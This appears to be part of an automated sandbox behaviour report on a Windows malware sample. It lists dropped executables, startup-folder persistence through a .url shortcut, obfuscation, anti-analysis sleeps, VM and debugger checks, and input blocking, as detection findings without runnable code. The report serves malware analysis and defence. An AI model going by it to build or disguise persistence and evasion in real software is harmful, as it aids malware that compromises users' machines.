Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe Static file information: File size 2016768 > 1048576
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C7634 LoadLibraryA,GetProcAddress, 0_2_00007FF7978C7634
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978678FD push rdi; ret 0_2_00007FF797867904
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797867399 push rdi; ret 0_2_00007FF7978673A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8742C0 pushad ; ret 1_2_00007FFD9B8742FD
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048E93F push edi; ret 3_2_0048E941
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C8A4A push FFFFFF8Bh; iretd 3_2_004C8A4C
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048EA58 push esi; ret 3_2_0048EA5A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00488B75 push ecx; ret 3_2_00488B88
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0047CBF1 push eax; retf 3_2_0047CBF8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048EC33 push esi; ret 3_2_0048EC35
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048ED1C push edi; ret 3_2_0048ED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4E93F push edi; ret 8_2_00F4E941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4EA58 push esi; ret 8_2_00F4EA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F88A4A push FFFFFF8Bh; iretd 8_2_00F88A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F48B75 push ecx; ret 8_2_00F48B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4EC33 push esi; ret 8_2_00F4EC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4ED1C push edi; ret 8_2_00F4ED1E

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\Public\InformationCheck.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Jump to dropped file
Drops PE files
Source: C:\Users\Public\InformationCheck.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797854514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00007FF797854514
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 3_2_004E59B3
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00475EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 3_2_00475EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FA59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 8_2_00FA59B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F35EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 8_2_00F35EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004833B7
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5071 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4799 Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\Public\InformationCheck.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 3.4 %
Source: C:\Users\Public\InformationCheck.exe API coverage: 6.1 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif API coverage: 4.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7978AB7C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00007FF7978B72A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B71F4 FindFirstFileW,FindClose, 0_2_00007FF7978B71F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7978ABC70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00007FF7978BA874
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00007FF7978AC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF7978BA4F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B6428 FindFirstFileW,FindNextFileW,FindClose, 0_2_00007FF7978B6428
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF7978BA350
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797872F50 FindFirstFileExW, 0_2_00007FF797872F50
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_004C4005
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_004C494A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_004CC2FF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CCD14 FindFirstFileW,FindClose, 3_2_004CCD14
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_004CCD9F
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_004CF5D8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_004CF735
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_004CFA36
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_004C3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F84005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8494A GetFileAttributesW,FindFirstFileW,FindClose, 8_2_00F8494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00F8C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 8_2_00F8CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8CD14 FindFirstFileW,FindClose, 8_2_00F8CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00F8FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F83CE2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797851D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_00007FF797851D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000001.00000002.2033706127.000001C734A55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000001.00000002.2033706127.000001C734A07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\InformationCheck.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C0A00 BlockInput, 0_2_00007FF7978C0A00
Contains functionality to check if a debugger is running (IsDebuggerPresent)
